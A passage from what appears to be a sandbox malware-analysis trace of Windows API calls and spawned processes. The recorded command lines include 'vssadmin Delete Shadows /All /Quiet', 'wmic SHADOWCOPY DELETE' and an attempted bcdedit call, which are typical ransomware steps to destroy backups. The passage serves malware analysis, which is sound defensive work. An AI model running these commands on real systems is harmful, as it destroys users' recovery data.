lpConsoleScreenBufferInfo=0x33f344) returned 1 [0077.576] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0077.576] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x33f384 | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0077.576] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a834640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x33f368, lpReserved=0x0 | out: lpBuffer=0x4a834640*, lpNumberOfCharsWritten=0x33f368*=0x62) returned 1 [0077.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.577] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.577] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0077.577] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.578] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0077.578] SetConsoleInputExeNameW () returned 0x1 [0077.578] GetConsoleOutputCP () returned 0x1b5 [0077.578] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0077.578] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.578] exit (_Code=1) Process: id = "14" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x44721000" os_pid = "0x7b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xb40" cmd_line = "vssadmin Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 44 os_tid = 0xc0 Thread: id = 46 os_tid = 0x6f4 Thread: id = 47 os_tid = 0x568 Thread: id = 48 os_tid = 0x114 Thread: id = 49 os_tid = 0xb10 Process: id = "15" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x45a71000" os_pid = "0x208" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xa4c" cmd_line = "wmic SHADOWCOPY DELETE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 45 os_tid = 0x20c [0092.821] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfaf4 | out: lpSystemTimeAsFileTime=0xcfaf4*(dwLowDateTime=0xf849e860, dwHighDateTime=0x1d61645)) [0092.821] GetCurrentProcessId () returned 0x208 [0092.821] GetCurrentThreadId () returned 0x20c [0092.821] GetTickCount () returned 0x114bcab [0092.821] QueryPerformanceCounter (in: lpPerformanceCount=0xcfaec | out: lpPerformanceCount=0xcfaec*=21317615898) returned 1 [0092.823] GetModuleHandleA (lpModuleName=0x0) returned 0x9f0000 [0092.823] __set_app_type (_Type=0x1) [0092.823] __p__fmode () returned 0x770331f4 [0092.823] __p__commode () returned 0x770331fc [0092.823] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa2dc15) returned 0x0 [0092.823] __wgetmainargs (in: _Argc=0xa3c5e8, _Argv=0xa3c5f0, _Env=0xa3c5ec, _DoWildCard=0, _StartInfo=0xa3c5fc | out: _Argc=0xa3c5e8, _Argv=0xa3c5f0, _Env=0xa3c5ec) returned 0 [0093.390] ??0CHString@@QAE@XZ () returned 0xa3c28c [0093.390] malloc (_Size=0x18) returned 0x1a13b8 [0093.483] malloc (_Size=0x38) returned 0x1a13d8 [0093.483] malloc (_Size=0x28) returned 0x1a3dc8 [0093.483] malloc (_Size=0x18) returned 0x1a3df8 [0093.483] malloc (_Size=0x24) returned 0x1a3e18 [0093.530] malloc (_Size=0x18) returned 0x1a3e48 [0093.530] malloc (_Size=0x18) returned 0x1a3e68 [0093.530] ??0CHString@@QAE@XZ () returned 0xa3c594 [0093.530] malloc (_Size=0x18) returned 0x1a3e88 [0093.530] ?Empty@CHString@@QAEXXZ () returned 0x74960504 [0093.530] SetConsoleCtrlHandler (HandlerRoutine=0xa26b6f, Add=1) returned 1 [0093.530] _onexit (_Func=0xa32f1f) returned 0xa32f1f [0093.530] _onexit (_Func=0xa32f2e) returned 0xa32f2e [0093.530] _onexit (_Func=0xa32f42) returned 0xa32f42 [0093.531] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.531] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0093.532] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0093.782] CoCreateInstance (in: rclsid=0x9f6c60*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x9f6b90*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa3c1b0 | out: ppv=0xa3c1b0*=0x2000828) returned 0x0 [0096.464] GetCurrentProcess () returned 0xffffffff [0096.464] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xcf99c | out: TokenHandle=0xcf99c*=0x108) returned 1 [0096.464] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcf998 | out: TokenInformation=0x0, ReturnLength=0xcf998) returned 0 [0096.464] malloc (_Size=0x118) returned 0x1a2788 [0096.464] GetTokenInformation (in: TokenHandle=0x108, TokenInformationClass=0x3, TokenInformation=0x1a2788, TokenInformationLength=0x118, ReturnLength=0xcf998 | out: TokenInformation=0x1a2788, ReturnLength=0xcf998) returned 1 [0096.464] AdjustTokenPrivileges (in: TokenHandle=0x108, DisableAllPrivileges=0, NewState=0x1a2788*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0096.464] free (_Block=0x1a2788) [0096.464] CloseHandle (hObject=0x108) returned 1 [0096.465] malloc (_Size=0x40) returned 0x1a2788 [0096.465] malloc (_Size=0x40) returned 0x1a27d0 [0096.465] malloc (_Size=0x40) returned 0x1a2818 [0096.465] malloc (_Size=0x20a) returned 0x1a2860 [0096.465] GetSystemDirectoryW (in: lpBuffer=0x1a2860, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0096.465] free (_Block=0x1a2860) [0096.556] malloc (_Size=0xc) returned 0x1a3fb8 [0096.556] malloc (_Size=0xc) returned 0x1a3fd0 [0096.556] malloc (_Size=0xc) returned 0x1a2860 [0096.556] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0096.556] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0096.557] free (_Block=0x1a3fb8) [0096.557] free (_Block=0x1a3fd0) [0096.557] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76d30000 [0096.558] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0096.558] SetThreadUILanguage (LangId=0x0) returned 0x409 [0096.559] FreeLibrary (hLibModule=0x76d30000) returned 1 [0096.559] free (_Block=0x1a2860) [0096.559] _vsnwprintf (in: _Buffer=0x1a2818, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xcf8f8 | out: _Buffer="ms_409") returned 6 [0096.559] malloc (_Size=0x20) returned 0x1a3fb8 [0096.559] GetComputerNameW (in: lpBuffer=0x1a3fb8, nSize=0xcf950 | out: lpBuffer="XDUWTFONO", nSize=0xcf950) returned 1 [0096.560] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.560] malloc (_Size=0x14) returned 0x1a2860 [0096.560] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.560] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xcf98c | out: lpNameBuffer=0x0, nSize=0xcf98c) returned 0x0 [0096.561] GetLastError () returned 0xea [0096.561] malloc (_Size=0x40) returned 0x1a2880 [0096.561] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1a2880, nSize=0xcf98c | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcf98c) returned 0x1 [0096.562] lstrlenW (lpString="") returned 0 [0096.562] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.562] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0096.564] lstrlenW (lpString=".") returned 1 [0096.564] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.564] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0096.564] lstrlenW (lpString="LOCALHOST") returned 9 [0096.564] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.564] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0096.564] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.564] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.565] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0096.565] free (_Block=0x1a2860) [0096.565] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.565] malloc (_Size=0x14) returned 0x1a2860 [0096.565] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.565] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.565] malloc (_Size=0x14) returned 0x1a28c8 [0096.565] lstrlenW (lpString="XDUWTFONO") returned 9 [0096.565] malloc (_Size=0x4) returned 0x1a28e8 [0096.565] malloc (_Size=0xc) returned 0x1a28f8 [0096.565] malloc (_Size=0x18) returned 0x1a2910 [0096.565] malloc (_Size=0xc) returned 0x1a2930 [0096.565] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.565] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.566] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.566] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.566] malloc (_Size=0x18) returned 0x1a2948 [0096.566] malloc (_Size=0xc) returned 0x1a2968 [0096.566] SysStringLen (param_1="IMPERSONATE") returned 0xb [0096.566] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.566] SysStringLen (param_1="IMPERSONATE") returned 0xb [0096.566] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.566] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.566] SysStringLen (param_1="IMPERSONATE") returned 0xb [0096.566] malloc (_Size=0x18) returned 0x1a2980 [0096.566] malloc (_Size=0xc) returned 0x1a29a0 [0096.566] SysStringLen (param_1="DELEGATE") returned 0x8 [0096.566] SysStringLen (param_1="IDENTIFY") returned 0x8 [0096.566] SysStringLen (param_1="DELEGATE") returned 0x8 [0096.566] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.566] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0096.567] SysStringLen (param_1="DELEGATE") returned 0x8 [0096.567] malloc (_Size=0x18) returned 0x1a29b8 [0096.567] malloc (_Size=0xc) returned 0x1a29d8 [0096.567] malloc (_Size=0x18) returned 0x1a29f0 [0096.567] malloc (_Size=0xc) returned 0x1a2a10 [0096.567] SysStringLen (param_1="NONE") returned 0x4 [0096.567] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.567] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.567] SysStringLen (param_1="NONE") returned 0x4 [0096.567] malloc (_Size=0x18) returned 0x1a2a28 [0096.567] malloc (_Size=0xc) returned 0x1a2a48 [0096.569] SysStringLen (param_1="CONNECT") returned 0x7 [0096.569] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.569] malloc (_Size=0x18) returned 0x1a2a60 [0096.569] malloc (_Size=0xc) returned 0x1a2a80 [0096.572] SysStringLen (param_1="CALL") returned 0x4 [0096.572] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.572] SysStringLen (param_1="CALL") returned 0x4 [0096.572] SysStringLen (param_1="CONNECT") returned 0x7 [0096.572] malloc (_Size=0x18) returned 0x1ae868 [0096.572] malloc (_Size=0xc) returned 0x1a2e98 [0096.572] SysStringLen (param_1="PKT") returned 0x3 [0096.572] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.572] SysStringLen (param_1="PKT") returned 0x3 [0096.572] SysStringLen (param_1="NONE") returned 0x4 [0096.572] SysStringLen (param_1="NONE") returned 0x4 [0096.572] SysStringLen (param_1="PKT") returned 0x3 [0096.572] malloc (_Size=0x18) returned 0x1ae888 [0096.572] malloc (_Size=0xc) returned 0x1a2eb0 [0096.572] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.573] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] SysStringLen (param_1="NONE") returned 0x4 [0096.573] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] SysStringLen (param_1="PKT") returned 0x3 [0096.573] SysStringLen (param_1="PKT") returned 0x3 [0096.573] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] malloc (_Size=0x18) returned 0x1ae8a8 [0096.573] malloc (_Size=0xc) returned 0x1a2ec8 [0096.573] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.573] SysStringLen (param_1="DEFAULT") returned 0x7 [0096.573] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.573] SysStringLen (param_1="PKT") returned 0x3 [0096.573] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.573] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0096.573] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0096.573] malloc (_Size=0x18) returned 0x1ae8c8 [0096.573] malloc (_Size=0x40) returned 0x1a2ee0 [0096.573] malloc (_Size=0x20a) returned 0x1a2f28 [0096.573] GetSystemDirectoryW (in: lpBuffer=0x1a2f28, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0096.574] free (_Block=0x1a2f28) [0096.574] malloc (_Size=0xc) returned 0x1a2f28 [0096.574] malloc (_Size=0xc) returned 0x1a2f40 [0096.574] malloc (_Size=0xc) returned 0x1a2f58 [0096.574] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0096.574] SysStringLen (param_1="\\wbem\\") returned 0x6 [0096.574] free (_Block=0x1a2f28) [0096.574] free (_Block=0x1a2f40) [0096.574] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0096.574] free (_Block=0x1a2f58) [0096.574] malloc (_Size=0xc) returned 0x1a2f28 [0096.574] malloc (_Size=0xc) returned 0x1a2f40 [0096.574] malloc (_Size=0xc) returned 0x1a2f58 [0096.574] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0096.574] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0096.575] free (_Block=0x1a2f28) [0096.575] free (_Block=0x1a2f40) [0096.575] GetCurrentThreadId () returned 0x20c [0096.575] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xcf4a8 | out: phkResult=0xcf4a8*=0x10c) returned 0x0 [0096.575] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xcf4b4, lpcbData=0xcf4b0*=0x400 | out: lpType=0x0, lpData=0xcf4b4*=0x30, lpcbData=0xcf4b0*=0x4) returned 0x0 [0096.575] _wcsicmp (_String1="0", _String2="1") returned -1 [0096.575] _wcsicmp (_String1="0", _String2="2") returned -2 [0096.575] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xcf4b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xcf4b0*=0x42) returned 0x0 [0096.575] malloc (_Size=0x86) returned 0x1a2f70 [0096.575] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x1a2f70, lpcbData=0xcf4b0*=0x42 | out: lpType=0x0, lpData=0x1a2f70*=0x25, lpcbData=0xcf4b0*=0x42) returned 0x0 [0096.576] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0096.576] malloc (_Size=0x42) returned 0x1a3000 [0096.576] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0096.576] RegQueryValueExW (in: hKey=0x10c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xcf4b4, lpcbData=0xcf4b0*=0x400 | out: lpType=0x0, lpData=0xcf4b4*=0x36, lpcbData=0xcf4b0*=0xc) returned 0x0 [0096.576] _wtol (_String="65536") returned 65536 [0096.576] free (_Block=0x1a2f70) [0096.576] RegCloseKey (hKey=0x0) returned 0x6 [0096.576] CoCreateInstance (in: rclsid=0x9f6d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x9f6d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xcf944 | out: ppv=0xcf944*=0x24c4630) returned 0x0 [0100.927] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x24c4630, xmlSource=0xcf8c8*(varType=0x8, wReserved1=0xffff, wReserved2=0x387a, wReserved3=0x77c7, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xcf92c | out: isSuccessful=0xcf92c*=0xffff) returned 0x0 [0103.987] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x24c4630, DOMElement=0xcf940 | out: DOMElement=0xcf940) returned 0x0 [0103.987] malloc (_Size=0xc) returned 0x1a2f28 [0103.988] free (_Block=0x1a2f28) [0103.988] malloc (_Size=0xc) returned 0x1a2f28 [0103.988] free (_Block=0x1a2f28) [0103.988] malloc (_Size=0xc) returned 0x1a2f28 [0103.988] malloc (_Size=0xc) returned 0x1a2f40 [0103.988] malloc (_Size=0x18) returned 0x1ae8e8 [0103.989] malloc (_Size=0xc) returned 0x1a3160 [0103.989] free (_Block=0x1a3160) [0103.989] malloc (_Size=0xc) returned 0x1a3160 [0103.989] malloc (_Size=0xc) returned 0x1a3178 [0103.989] SysStringLen (param_1="VALUE") returned 0x5 [0103.989] SysStringLen (param_1="TABLE") returned 0x5 [0103.989] SysStringLen (param_1="TABLE") returned 0x5 [0103.989] SysStringLen (param_1="VALUE") returned 0x5 [0103.989] malloc (_Size=0x18) returned 0x1ae908 [0103.990] malloc (_Size=0xc) returned 0x1a3190 [0103.990] free (_Block=0x1a3190) [0103.990] malloc (_Size=0xc) returned 0x1afac8 [0103.990] malloc (_Size=0xc) returned 0x1afae0 [0103.990] SysStringLen (param_1="LIST") returned 0x4 [0103.990] SysStringLen (param_1="TABLE") returned 0x5 [0103.990] malloc (_Size=0x18) returned 0x1ae928 [0103.991] malloc (_Size=0xc) returned 0x1afaf8 [0103.991] free (_Block=0x1afaf8) [0103.991] malloc (_Size=0xc) returned 0x1afaf8 [0103.991] malloc (_Size=0xc) returned 0x1afb10 [0103.991] SysStringLen (param_1="RAWXML") returned 0x6 [0103.991] SysStringLen (param_1="TABLE") returned 0x5 [0103.991] SysStringLen (param_1="RAWXML") returned 0x6 [0103.991] SysStringLen (param_1="LIST") returned 0x4 [0103.991] SysStringLen (param_1="LIST") returned 0x4 [0103.991] SysStringLen (param_1="RAWXML") returned 0x6 [0103.991] malloc (_Size=0x18) returned 0x1ae948 [0103.992] malloc (_Size=0xc) returned 0x1afb28 [0103.992] free (_Block=0x1afb28) [0103.992] malloc (_Size=0xc) returned 0x1afb28 [0103.992] malloc (_Size=0xc) returned 0x1afb40 [0103.992] SysStringLen (param_1="HTABLE") returned 0x6 [0103.992] SysStringLen (param_1="TABLE") returned 0x5 [0103.992] SysStringLen (param_1="HTABLE") returned 0x6 [0103.992] SysStringLen (param_1="LIST") returned 0x4 [0103.992] malloc (_Size=0x18) returned 0x1ae968 [0103.993] malloc (_Size=0xc) returned 0x1afb58 [0103.993] free (_Block=0x1afb58) [0103.993] malloc (_Size=0xc) returned 0x1afb58 [0103.993] malloc (_Size=0xc) returned 0x1afb70 [0103.993] SysStringLen (param_1="HFORM") returned 0x5 [0103.993] SysStringLen (param_1="TABLE") returned 0x5 [0103.993] SysStringLen (param_1="HFORM") returned 0x5 [0103.993] SysStringLen (param_1="LIST") returned 0x4 [0103.993] SysStringLen (param_1="HFORM") returned 0x5 [0103.993] SysStringLen (param_1="HTABLE") returned 0x6 [0103.993] malloc (_Size=0x18) returned 0x1ae988 [0103.994] malloc (_Size=0xc) returned 0x1afb88 [0103.994] free (_Block=0x1afb88) [0103.994] malloc (_Size=0xc) returned 0x1afb88 [0103.994] malloc (_Size=0xc) returned 0x1afba0 [0103.994] SysStringLen (param_1="XML") returned 0x3 [0103.994] SysStringLen (param_1="TABLE") returned 0x5 [0103.994] SysStringLen (param_1="XML") returned 0x3 [0103.994] SysStringLen (param_1="VALUE") returned 0x5 [0103.994] SysStringLen (param_1="VALUE") returned 0x5 [0103.994] SysStringLen (param_1="XML") returned 0x3 [0103.994] malloc (_Size=0x18) returned 0x1ae9a8 [0103.995] malloc (_Size=0xc) returned 0x1afbb8 [0103.995] free (_Block=0x1afbb8) [0103.997] malloc (_Size=0xc) returned 0x1afbb8 [0103.997] malloc (_Size=0xc) returned 0x1afbd0 [0103.997] SysStringLen (param_1="MOF") returned 0x3 [0103.997] SysStringLen (param_1="TABLE") returned 0x5 [0103.997] SysStringLen (param_1="MOF") returned 0x3 [0103.997] SysStringLen (param_1="LIST") returned 0x4 [0103.997] SysStringLen (param_1="MOF") returned 0x3 [0103.997] SysStringLen (param_1="RAWXML") returned 0x6 [0103.997] SysStringLen (param_1="LIST") returned 0x4 [0103.997] SysStringLen (param_1="MOF") returned 0x3 [0103.997] malloc (_Size=0x18) returned 0x1ae9c8 [0103.998] malloc (_Size=0xc) returned 0x1afbe8 [0103.998] free (_Block=0x1afbe8) [0103.998] malloc (_Size=0xc) returned 0x1afbe8 [0103.998] malloc (_Size=0xc) returned 0x1afc00 [0103.998] SysStringLen (param_1="CSV") returned 0x3 [0103.998] SysStringLen (param_1="TABLE") returned 0x5 [0103.998] SysStringLen (param_1="CSV") returned 0x3 [0103.998] SysStringLen (param_1="LIST") returned 0x4 [0103.998] SysStringLen (param_1="CSV") returned 0x3 [0103.998] SysStringLen (param_1="HTABLE") returned 0x6 [0103.998] SysStringLen (param_1="CSV") returned 0x3 [0103.998] SysStringLen (param_1="HFORM") returned 0x5 [0103.998] malloc (_Size=0x18) returned 0x1ae9e8 [0103.999] malloc (_Size=0xc) returned 0x1afc18 [0103.999] free (_Block=0x1afc18) [0103.999] malloc (_Size=0xc) returned 0x1afc18 [0103.999] malloc (_Size=0xc) returned 0x1afc30 [0103.999] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.999] SysStringLen (param_1="TABLE") returned 0x5 [0103.999] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.999] SysStringLen (param_1="VALUE") returned 0x5 [0103.999] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.999] SysStringLen (param_1="XML") returned 0x3 [0103.999] SysStringLen (param_1="XML") returned 0x3 [0103.999] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0103.999] malloc (_Size=0x18) returned 0x1aea08 [0104.000] malloc (_Size=0xc) returned 0x1afc48 [0104.000] free (_Block=0x1afc48) [0104.000] malloc (_Size=0xc) returned 0x1afc48 [0104.000] malloc (_Size=0xc) returned 0x1afc60 [0104.000] SysStringLen (param_1="texttablewsys") returned 0xd [0104.000] SysStringLen (param_1="TABLE") returned 0x5 [0104.000] SysStringLen (param_1="texttablewsys") returned 0xd [0104.000] SysStringLen (param_1="XML") returned 0x3 [0104.000] SysStringLen (param_1="texttablewsys") returned 0xd [0104.000] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.000] SysStringLen (param_1="XML") returned 0x3 [0104.000] SysStringLen (param_1="texttablewsys") returned 0xd [0104.000] malloc (_Size=0x18) returned 0x1aea28 [0104.001] malloc (_Size=0xc) returned 0x1afc78 [0104.001] free (_Block=0x1afc78) [0104.001] malloc (_Size=0xc) returned 0x1afc78 [0104.001] malloc (_Size=0xc) returned 0x1afc90 [0104.001] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.001] SysStringLen (param_1="TABLE") returned 0x5 [0104.001] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.001] SysStringLen (param_1="XML") returned 0x3 [0104.001] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.001] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.001] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.002] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.002] malloc (_Size=0x18) returned 0x1aea48 [0104.002] malloc (_Size=0xc) returned 0x1afca8 [0104.002] free (_Block=0x1afca8) [0104.002] malloc (_Size=0xc) returned 0x1afca8 [0104.002] malloc (_Size=0xc) returned 0x1afcc0 [0104.002] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.002] SysStringLen (param_1="TABLE") returned 0x5 [0104.002] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.002] SysStringLen (param_1="XML") returned 0x3 [0104.002] SysStringLen (param_1="wmiclitableformat") returned 